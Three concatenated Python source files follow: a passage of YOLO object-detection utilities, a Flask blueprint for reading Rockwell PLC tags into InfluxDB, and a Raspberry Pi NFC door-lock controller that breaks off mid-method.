best_bboxes = []
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
# Process 1: Determine whether the number of bounding boxes is greater than 0
while len(cls_bboxes) > 0:
# Process 2: Select the bounding box with the highest score according to socre order A
max_ind = np.argmax(cls_bboxes[:, 4])
best_bbox = cls_bboxes[max_ind]
best_bboxes.append(best_bbox)
cls_bboxes = np.concatenate([cls_bboxes[: max_ind], cls_bboxes[max_ind + 1:]])
# Process 3: Calculate this bounding box A and
# Remain all iou of the bounding box and remove those bounding boxes whose iou value is higher than the threshold
iou = bboxes_iou(best_bbox[np.newaxis, :4], cls_bboxes[:, :4])
weight = np.ones((len(iou),), dtype=np.float32)
assert method in ['nms', 'soft-nms']
if method == 'nms':
iou_mask = iou > iou_threshold
weight[iou_mask] = 0.0
if method == 'soft-nms':
weight = np.exp(-(1.0 * iou ** 2 / sigma))
cls_bboxes[:, 4] = cls_bboxes[:, 4] * weight
score_mask = cls_bboxes[:, 4] > 0.
cls_bboxes = cls_bboxes[score_mask]
return best_bboxes
def postprocess_boxes(pred_bbox, original_image, input_size, score_threshold):
valid_scale=[0, np.inf]
pred_bbox = np.array(pred_bbox)
pred_xywh = pred_bbox[:, 0:4]
pred_conf = pred_bbox[:, 4]
pred_prob = pred_bbox[:, 5:]
# 1. (x, y, w, h) --> (xmin, ymin, xmax, ymax)
pred_coor = np.concatenate([pred_xywh[:, :2] - pred_xywh[:, 2:] * 0.5,
pred_xywh[:, :2] + pred_xywh[:, 2:] * 0.5], axis=-1)
# 2. (xmin, ymin, xmax, ymax) -> (xmin_org, ymin_org, xmax_org, ymax_org)
org_h, org_w = original_image.shape[:2]
resize_ratio = min(input_size / org_w, input_size / org_h)
dw = (input_size - resize_ratio * org_w) / 2
dh = (input_size - resize_ratio * org_h) / 2
pred_coor[:, 0::2] = 1.0 * (pred_coor[:, 0::2] - dw) / resize_ratio
pred_coor[:, 1::2] = 1.0 * (pred_coor[:, 1::2] - dh) / resize_ratio
# 3. clip some boxes those are out of range
pred_coor = np.concatenate([np.maximum(pred_coor[:, :2], [0, 0]),
np.minimum(pred_coor[:, 2:], [org_w - 1, org_h - 1])], axis=-1)
invalid_mask = np.logical_or((pred_coor[:, 0] > pred_coor[:, 2]), (pred_coor[:, 1] > pred_coor[:, 3]))
pred_coor[invalid_mask] = 0
# 4. discard some invalid boxes
bboxes_scale = np.sqrt(np.multiply.reduce(pred_coor[:, 2:4] - pred_coor[:, 0:2], axis=-1))
scale_mask = np.logical_and((valid_scale[0] < bboxes_scale), (bboxes_scale < valid_scale[1]))
# 5. discard boxes with low scores
classes = np.argmax(pred_prob, axis=-1)
scores = pred_conf * pred_prob[np.arange(len(pred_coor)), classes]
score_mask = scores > score_threshold
mask = np.logical_and(scale_mask, score_mask)
coors, scores, classes = pred_coor[mask], scores[mask], classes[mask]
return np.concatenate([coors, scores[:, np.newaxis], classes[:, np.newaxis]], axis=-1)
def detect_image(Yolo, image_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': cv2.imwrite(output_path, image)
if show:
# Show the image
cv2.imshow("predicted image", image)
# Load and hold the image
cv2.waitKey(0)
# To close the window after the required kill value was provided
cv2.destroyAllWindows()
return image
def Predict_bbox_mp(Frames_data, Predicted_data, Processing_times):
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: print("RuntimeError in tf.config.experimental.list_physical_devices('GPU')")
Yolo = Load_Yolo_model()
times = []
while True:
if Frames_data.qsize()>0:
image_data = Frames_data.get()
t1 = time.time()
Processing_times.put(time.time())
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
Predicted_data.put(pred_bbox)
def postprocess_mp(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime):
times = []
while True:
if Predicted_data.qsize()>0:
pred_bbox = Predicted_data.get()
if realtime:
while original_frames.qsize() > 1:
original_image = original_frames.get()
else:
original_image = original_frames.get()
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
times.append(time.time()-Processing_times.get())
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Final FPS: {:.1f}".format(ms, fps))
Processed_frames.put(image)
def Show_Image_mp(Processed_frames, show, Final_frames):
while True:
if Processed_frames.qsize()>0:
image = Processed_frames.get()
Final_frames.put(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
# detect from webcam
def detect_video_realtime_mp(video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', realtime=False):
if realtime:
vid = cv2.VideoCapture(0)
else:
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
no_of_frames = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))
original_frames = Queue()
Frames_data = Queue()
Predicted_data = Queue()
Processed_frames = Queue()
Processing_times = Queue()
Final_frames = Queue()
p1 = Process(target=Predict_bbox_mp, args=(Frames_data, Predicted_data, Processing_times))
p2 = Process(target=postprocess_mp, args=(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime))
p3 = Process(target=Show_Image_mp, args=(Processed_frames, show, Final_frames))
p1.start()
p2.start()
p3.start()
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_frames.put(original_image)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
Frames_data.put(image_data)
while True:
if original_frames.qsize() == 0 and Frames_data.qsize() == 0 and Predicted_data.qsize() == 0 and Processed_frames.qsize() == 0 and Processing_times.qsize() == 0 and Final_frames.qsize() == 0:
p1.terminate()
p2.terminate()
p3.terminate()
break
elif Final_frames.qsize()>0:
image = Final_frames.get()
if output_path != '': out.write(image)
cv2.destroyAllWindows()
def detect_video(Yolo, video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times, times_2 = [], []
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, img = vid.read()
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
t3 = time.time()
times.append(t2-t1)
times_2.append(t3-t1)
times = times[-20:]
times_2 = times_2[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
fps2 = 1000 / (sum(times_2)/len(times_2)*1000)
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
print("Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps, fps2))
if output_path != '': out.write(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
# detect from webcam
def detect_realtime(Yolo, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times = []
vid = cv2.VideoCapture(0)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, frame = vid.read()
try:
original_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
original_frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_frame), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_frame, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
times.append(t2-t1)
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
frame = draw_bbox(original_frame, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_frame, bboxes, read_class_names(CLASSES))
image = cv2.putText(frame, "Time: {:.1f}FPS".format(fps), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if output_path != '': out.write(frame)
if show:
cv2.imshow('output', frame)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
|
rockwell.py
|
# from blueprints.influxdb import *
# from main import *
from flask import Flask, render_template, request, redirect, url_for, flash, session, send_from_directory, send_file,Blueprint,current_app
from flask_bootstrap import Bootstrap
import random, datetime
from functools import wraps
import time
import functools
import os
from werkzeug.utils import secure_filename
import csv
import pandas as pd
import numpy as np
from struct import pack, unpack_from # Pylogix 结构体解析
from blueprints.login import is_login
import blueprints.influxdb
import threading
from flask import copy_current_request_context
import gevent
rockwell_ = Blueprint("rockwell_",__name__)
'''
罗克韦尔AB Pylogix 0.6.2
'''
# from pylogix import *
from pylogix import PLC
class Timer(object):
def __init__(self, data):
self.PRE = unpack_from('<i', data, 6)[0]
self.ACC = unpack_from('<i', data, 10)[0]
bits = unpack_from('<i', data, 2)[0]
self.EN = get_bit(bits, 31)
self.TT = get_bit(bits, 30)
self.DN = get_bit(bits, 29)
class Motion(object): # Su 仿照Timer类型添加Motion类型 ToDo
def __init__(self, data):
self.PRE = unpack_from('<i', data, 6)[0]
self.ACC = unpack_from('<i', data, 10)[0]
bits = unpack_from('<i', data, 2)[0]
self.EN = get_bit(bits, 31)
self.TT = get_bit(bits, 30)
self.DN = get_bit(bits, 29)
def get_bit(value, bit_number):
'''
Returns the specific bit of a word
'''
mask = 1 << bit_number
if (value & mask):
return True
else:
return False
######################### 罗克韦尔 ##############################
global rockwellip,rockwell_device_list,taglist
rockwellip=''
rockwelldata=()
rockwell_device_list=[]
ttt=''
taglist=[]
@rockwell_.route("/rockwell",methods=["POST","GET"])
@is_login
def rockwell():
## Rockwell AB PLC # #108厂房设备
return render_template("rockwell.html")
@rockwell_.route("/rockwellread",methods=["POST","GET"])
@is_login
def rockwellread(): #'读取函数'
# print("readlist")
print(taglist)
### 分批读取函数 每次读取10个变量
def readten(tags_list):
l = len(tags_list) # 变量表长度,如果大于10 必须分批读取保证不报错
x = l // 10 # 取整
y = l % 10 # 取余数
a = 0 # 每一组变量的上标
val = [] # 初始化列表 每一组变量值
for n in range(x):
if n < x:
val = val + comm.Read(tags_list[10 * a:10 * (a + 1)])
a += 1
n += 1
if n == x and y != 0:
val = val + comm.Read(tags_list[10 * a:10 * a + y])
vall = val
return vall
with PLC() as comm:
tagname=[]
tagvalue=[]
comm.IPAddress=rockwellip
aa=readten(taglist) #调用函数分批读取变量
ttt=time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
print(aa)
for a in aa:
tagname.append(a.TagName)
# 对于 IO 特殊处理 转换为0000/0000/0000/0000形式 #
# IO长度不一定 暂定按16个 且形式不确定 IO模块数据类型复杂
# todo 原版程序 根据500T IO解析列表,分情况处理 主要是长度不同 变量名也不同
##############################
# if a.TagName == "Local:1:I.Data" or a.TagName == "Local:1:O.Data" :
# if a.Value < 0 :
# a.Value = 65536 + a.Value
# b = ('{:016b}'.format(a.Value))[::-1] #转二进制并 高位补零 IO逆序输出
# b=list(b)
# b.insert(4, '/')
# b.insert(9, '/')
# b.insert(14, '/')
# a.Value = ''.join(b)
# tagvalue.append(a.Value)
##############################
# todo 测试用 仅包含IO变量 (原版在上面)
# if a.TagName == "Local:1:I.Data" or a.TagName == "Local:1:O.Data" :
# todo 需要区分数字量还是模拟量 数字量格式化为二进制 模拟量不格式化
# todo 位数不同处理不同 16位和32位有交集 不应该从数字大小判断位数长度 根据位数长度 选择对应的变换函数
# todo 仅针对数字量
# if a.Value >= -32768 and a.Value <= 32767:
## 16位DIO变换函数
def DIO16(a):
if a.Value < 0:
# print(a)
a.Value = 32767 - a.Value
b = ('{:016b}'.format(a.Value))[::-1] #转二进制并 高位补零 IO逆序输出
b=list(b)
b.insert(4, '/')
b.insert(9, '/')
b.insert(14, '/')
a.Value = ''.join(b)
return a.Value
# elif a.Value >= -2147483648 and a.Value <= 2147483647:
## 32位DIO变换函数
def DIO32(a):
if a.Value < 0:
a.Value = 2147483647 - a.Value
b = ('{:032b}'.format(a.Value))[::-1] # 转二进制并 高位补零 IO逆序输出
b = list(b)
b.insert(4, '/')
b.insert(9, '/')
b.insert(14, '/')
b.insert(19, '/')
b.insert(24, '/')
b.insert(29, '/')
b.insert(34, '/')
a.Value = ''.join(b)
return a.Value
# # todo 根据iotype进行转换 变量表中也需要判断解析 生成相应的表变量名
# if IOtype是16位
# a.Value=DIO16(a)
# if IOtype是32位
# a.Value=DIO32()
# if IOtype是AIO
# 不用转二进制
tagvalue.append(a.Value)
######################################
# todo 仅针对IO变量 读取不做格式化 模拟量用不用取正值?
# tagvalue.append(a.Value)
######################################3
# 输出到前端页面
rockwelldata=dict(zip(tagname,tagvalue))
# return rockwelldata
print(rockwelldata)
# return redirect("#data")
# global influxdata
# influxdata=rockwelldata
return render_template("rockwell.html",rockwelldata=rockwelldata,ttt=ttt),rockwelldata
def rockwellreadexcel(file):
print("readexcel"+file.filename)
# data = pd.DataFrame(pd.read_excel(file))
# data2 = pd.read_excel(file, usecols=[0], header=None) ##第一列 无表头 输出为DataFrame格式 带索引
data2 = pd.read_excel(file) ##输出为DataFrame格式 后续剔除未知类型
data2 = data2.dropna() ##剔除异常的nan
# 变量筛选 不算是完全通用的筛选方式 ##剔除程序名,C变量 和已知类型之外的数据,保留IO变量
# isin()删选非IO变量 data2['TagType'].isin(["INT","DINT","BOOL", "REAL","COUNTER","TIMER","DWORD"]) 变量筛选
# todo Embedded不符合之前的处理规则 还需要另外处理
data2 = data2[data2['TagType'].isin(["INT", "DINT", "BOOL", "REAL"])
| data2['TagName'].str.contains("Local:")
& ~data2['TagName'].str.contains(":C")
& ~data2['TagType'].str.contains("ASCII|MODULE|Embedded")]
# data2 = data2.reset_index(drop=True) #
# todo 对于实验室的PLC 没有IO模块 以下程序都不适用了
# 变量表中需要判断解析 生成相应的表变量名
# 筛选变量 根据IO性质,剔除无用OI变量 (I的剔除O O的剔除I) 也可以写为 data2.TagType 不过看起来不够明显,修改不方便
data2 = data2[(data2['TagType'].str.contains("I") & ~data2['TagType'].str.contains("O"))
| (data2['TagType'].str.contains("O") & ~data2['TagType'].str.contains("I"))]
data2 = data2.reset_index(drop=True) # 实际数据列表的数据删除了 但是旧的索引依然存在 需要重新生成索引
# 生成IOtype列 以下所有操作根据IOType进行 减少匹配和筛选
import re # 正则表达式库
IOtype = data2['TagType'].to_numpy().tolist()
IOtype = re.findall(r'_(.+?):', str(IOtype))
print(IOtype)
# todo 对于完整变量表 insert需要在对应的行操作而不是直接插入 否则行数不匹配 不能直接按顺序插入 考虑IO和非IO分开?
data2.insert(2, 'IOtype', IOtype) # 添加一列作为IOType
# 提取IOType 判断多路还是一路
def IOTYPE(IOtype):
Ch = []
for i in IOtype:
ccc = (''.join(re.findall(r'\d+', str(i)))) # 点数 16位或 32位 或路数 返回值为列表 用join去除[]
if i[0] == "I" or i[0] == "O": # 判断是否是多路 第一位是I,O就是多路
Ch.append(ccc)
else:
Ch.append('one' + str(ccc))
# 考虑one32,Ch所有值统一为字符串 否则筛选会报错
return Ch
Ch = IOTYPE(IOtype)
data2.insert(3, 'Ch', Ch) # 添加一列作为IOType
data2.loc[data2.Ch.str.contains("one"), 'TagName'] += '.Data'
data2.loc[~data2.Ch.str.contains("one"), 'TagName'] += ".Ch0Data"
# print(data2)
##两个一样的模块 需要分别对应处理 嵌套循环 添加.ChXData
ii = 0
for n in Ch: # 此处的Ch暂时是列表 不是数据表中的Ch列
if ('one' in n) == False:
for i in range(1, int(n)): # range(1,8)=1~7 不包含8
# 这里误替换了编号“10” 里面的0 修改替换字段位'Ch0'
data2.loc[data2.shape[0]] = [(data2.loc[ii, 'TagName']).replace('Ch0', 'Ch' + str(i)),
data2.loc[ii, 'TagType'], data2.loc[ii, 'IOtype'], data2.loc[ii, 'Ch']]
ii += 1 # n的索引 对应各个Ch0Data
# print(data2) #最终处理的变量表
# todo 生成以后 需要保留Ch值,用于后续16位和32位的区分 最好可以省略
data2 = data2['TagName']
# print(data2)
global taglist
taglist = data2.to_numpy().tolist() # 转数组 转列表
# taglist = sum(data2, []) # 嵌套列表平铺 变量表list
print(taglist)
@rockwell_.route("/rockwells",methods=["POST","GET"])
@is_login
def rockwells():
with PLC() as comm:
# 设备扫描
deviceip = []
devicename = []
devices = comm.Discover()
for device in devices.Value:
deviceip.append(device.IPAddress)
devicename.append(device.ProductName + ' ' + device.IPAddress)
global rockwell_device_list
rockwell_device_list = dict(zip(devicename, deviceip)) # 创建设备字典 写入全局变量
scanresult="扫描到"+str(len(rockwell_device_list))+"台设备"
print(scanresult)
flash(scanresult,"scanresult") #扫描完成flash提示
return redirect("rockwellscan")
# dev_list=str(device_dict)
# return redirect(url_for(rockwell)) # url_for函数跳转
# flash(device_dict,"device_dict") #设备扫描结果显示到前端页面下拉列表
# 考虑开始连接会再次扫描设备,因此将s和scan分开 s扫描 之后跳转scan进行选择和表单操作 url为/rockwellscan
@rockwell_.route("/rockwellscan",methods=["POST","GET"])
@is_login
def rockwellscan():
if request.method == "POST":
flash("run", "run")
forminfo=request.form.to_dict() ## to_dict()加括号
# 该页面的表单信息,只要submit都传到这里
# forminfo=request.form.get('devicelist') # 获取到的value是str字符串
# 还包括变量地址信息以及influxdb配置信息,通过字典长度区分各个表单
# 已更新为 根据action value区分表单
# print(forminfo)
# print(type(forminfo))
# aa=type(forminfo)
######## 每次“开始连接”实际只是获取选择的设备ip并写入全局变量
# 程序逻辑调整为rockwellscan运行后跳转rockwellscan2 但是页面会整体刷新造成列表变化~~~~~~~~~~~
if forminfo["Action"]=="rockwellip" : # AB PLC 连接信息 只需要IP
print(forminfo)
aa=(forminfo["devicelist"]).split(" ")
aa=aa[len(aa)-1] #获取ip
global rockwellip # 全局变量 要先声明globa 再修改
rockwellip=aa
ss=("已连接到 "+str(forminfo["devicelist"]))
flash(ss, "scanresult") # 连接完成
# print(rockwellip)
# if (forminfo)=={}: # 上传变量表 #
if forminfo["Action"]=="file" : #### 是excel就调用readexcel
# print("22222222222")
try:
file = request.files.get('file')
file.save('D:/' + secure_filename(file.filename)) ## C盘写入权限受限Permission denied 暂存在D盘,linux中应该没问题
rockwellreadexcel(file)
except Exception as e:
# print(e)
flash(e, "uploadstatus")
else:
# 保存测试
flash("变量表上传成功", "uploadstatus")
# if len(forminfo) == 2: # 变量地址
# print(forminfo)
# data = s7read(plc, forminfo["iqm"], forminfo["address"])
# print(data)
# # return data
if forminfo["Action"]=="influxdb": # influxdb连接信息
print(forminfo)
influxdbip = forminfo["influxdb"]
token = forminfo["token"]
measurement = forminfo["measurement"]
cycle = forminfo["cycle"]
flash("写入InfluxDB", "influx")
# 添加线程 todo 上下文处理/线程的外部停止
# from flask import current_app
# from main import app
# app_ctx = app.app_context()
# app_ctx.push()
# with app.test_request_context("/rockwellscan"):
# print(current_app.name)
# influxdbip = forminfo["influxdb"]
# token = forminfo["token"]
# measurement = forminfo["measurement"]
# cycle = forminfo["cycle"]
# print(current_app)
# app.app_context().push()
t1 = threading.Thread(target= blueprints.influxdb.influxDB, args=(influxdbip, token, measurement, cycle,))
# t1.setDaemon(True)
t1.start()
# app_ctx.pop()
# influxDB(influxdbip, token, measurement, cycle)
# return redirect("#")
# flash(rockwell_device_list,"dev_list") #flash只能传递字符串
# return jsonify()
# return redirect(url_for("rockwell"))
return render_template("rockwell.html",dev_list=rockwell_device_list)#设备扫描结果显示到前端页面下拉列表
## 定向页面逻辑,此处要在rockwellscan中处理POST请求
## 前端调用后台程序 href=“xx” 通过路由调用,还有没有别的方法 采用url_for()跳转 参考登录函数处理方法
# return redirect("#")
@rockwell_.route("/rockwell_get_all_vars")
@is_login
#### 获取所有变量 并下载 # 待办,剔除程序名称,编写变量读取函数,连续获取变量表 时间不变bug
def rockwell_get_all_vars(): #
# print("111111111111111")
with PLC() as comm:
# print("111111111111")
####### 无法连续运行重复获取变量表? 连续点击不进入循环 直接下载附件?? 如果要刷新变量表需要再次“开始连接”##############
print(rockwellip)
if rockwellip=='':
print("请先选择设备IP地址")
else:
print(rockwellip)
comm.IPAddress = rockwellip #全局变量
# comm.IPAddress="192.168.100.200"
# print("2222222222")
try:
tags = comm.GetTagList() #输出是Response结构体类型需要解析
comm.Close()
except Exception as e:
print(e)
#缺一个return ,读取错误的错误处理
else:
tagname=[]
tagtype=[]
head=["TagName","TagType"]
for t in tags.Value:
tagname.append(t.TagName)
tagtype.append(t.DataType)
taglist = pd.DataFrame({'tagname': tagname, 'tagtype': tagtype}) #采用Pandas格式化
# print(taglist)
tt = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S') #时间标识符
filepath=("D:/Taglist "+tt+".xlsx")
print(filepath)
## 变量表文件暂存以备发送和自动读取
taglist.to_excel(filepath, encoding='utf-8', index=False, header=head) #写入excel
## 变量表文件下载
return send_file(filepath,as_attachment=True) #向前端发送文件 下载 比send_from_directory简化
# return send_from_directory(filepath,as_attachment=True) #
|
nfc_lock.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import time
import signal
import sys
import nfc
import threading
import os
import binascii
from neopixel import *
import argparse
from db import DataBase
from oled import OLED_Display
from datetime import datetime # 対ysmtインジケータランプ消灯用
class NFC_Kagisys():
"""サーボモータの制御"""
def __init__(self):
self.BUTTON_ON=19
self.BUTTON_OFF=26
self.BUTTON_SET=20
self.MODE = "Default"
"""基本設定とスレッドの呼び出し"""
#基本的なセッティング
self.db = DataBase()
self.oled = OLED_Display()
self.oled.display([self.MODE], ["en"])
signal.signal(signal.SIGINT, self.exit_handler)
th = threading.Thread(target=self.run, name="th", args=())
th.setDaemon(True)
th.start()
#Neopixel
# Create NeoPixel object with appropriate configuration.
self.strip = Adafruit_NeoPixel(1, 18, 800000, 10, False, 255, 0)
# Intialize the library (must be called once before other functions).
self.strip.begin()
#ボタン
GPIO.setmode(GPIO.BCM)
self.errLED = [13]
GPIO.setup(self.errLED, GPIO.OUT)
GPIO.setup(self.BUTTON_ON, GPIO.IN)
GPIO.setup(self.BUTTON_OFF, GPIO.IN)
GPIO.setup(self.BUTTON_SET, GPIO.IN)
GPIO.add_event_detect(self.BUTTON_ON, GPIO.RISING, callback=self.pushed_on, bouncetime=3000)
GPIO.add_event_detect(self.BUTTON_OFF, GPIO.RISING, callback=self.pushed_off, bouncetime=3000)
GPIO.add_event_detect(self.BUTTON_SET, GPIO.RISING, callback=self.pushed_register, bouncetime=3000)
while True:
time.sleep(1000)
def exit_handler(self, signal, frame):
"""終了時処理"""
print('Exit nfc')
self.clf.close()
GPIO.cleanup()
sys.exit(0)
def run(self):
"""メイン"""
self.clf = nfc.ContactlessFrontend('tty:AMA0:pn532')
#繰り返し
while True:
target_req = nfc.clf.RemoteTarget("212F")
target_req.sensf_req = bytearray.fromhex("0000030000")
target_res = self.clf.sense(target_req,iterations=10,interval=0.1)
if target_res != None:
tag = nfc.tag.activate(self.clf,target_res)
tag.sys = 3
idm = binascii.hexlify(tag.idm)
self.touched(idm)
time.sleep(3)
print("relese")
else:
time.sleep(1)
def touched(self,tag):
"""タッチされたときの処理"""
#idの照合
#tag_id = tag.identifier.encode("hex").upper()
tag_id=tag
print(tag_id)
self.db.addTouchedLog(tag_id)
# toggleの受け取り
toggle = self.get_toggle()
if self.MODE == "Default":
if not self.db.checkIDm(tag_id):
#データが正しいidと異なっていた場合
self.write_not_auth_id(tag_id)
self.led(toggle)
self.oled.display([self.MODE, tag_id], ["en", "ja"])
print("No matching Key")
print("setting OK.")
return
if toggle == "lock":
#鍵の解錠
self.Dopen()
elif toggle == "open":
#鍵の施錠
self.Dlock()
else:
print("error ! please check file path")
elif self.MODE == "Register":
if self.db.checkIDm(tag_id):
self.MODE = "Authorization"
self.oled.display([self.MODE, "登録するカードをタッチ"], ["en", "ja"])
else:
self.MODE = "Default"
self.oled.display([self.MODE, "登録失敗"], ["en", "ja"])
if toggle == "lock":
self.colorWipe(self.strip, Color(255, 0, 0)) #red
else:
self.colorWipe(self.strip, Color(20, 255, 35)) #green
elif self.MODE == "Authorization":
if not self.db.checkIDm(tag_id):
self.MODE = "Default"
self.db.addNewIDm(tag_id, "TestUser")
self.oled.display([self.MODE, "登録成功"], ["en", "ja"])
for i in range(2):
self.colorWipe(self.strip, Color(249, 243, 1))
time.sleep(.5)
self.colorWipe(self.strip, Color(0, 0, 0))
time.sleep(.5)
else:
self.MODE = "Default"
self.oled.display([self.MODE, "登録失敗"], ["en", "ja"])
if toggle == "lock":
self.colorWipe(self.strip, Color(255, 0, 0)) #red
else:
self.colorWipe(self.strip, Color(20, 255, 35)) #green
def pushed_on(self, sw):
print("bbbbbbbb")
toggle = self.get_toggle()
if toggle == "lock":
#鍵の解錠
self.Dopen()
def pushed_off(self, sw):
print("aaaaaaaaaa")
toggle = self.get_toggle()
if toggle == "open":
#鍵の施錠
self.Dlock()
def pushed_register(self, sw):
self.MODE = "Register"
self.colorWipe(self.strip, Color(249, 243, 1))
self.oled.display([self.MODE, "登録済みカードをタッチ"], ["en", "ja"])
def get_toggle(self):
"""toggleデータの取得"""
os.chdir("/home/pi/project/kagisys_logic/")
file_ = open("kagisys.toggle")
result = file_.read()
file_.close()
print(result)
return result
def write_not_auth_id(self,id):
"""write not to auth id"""
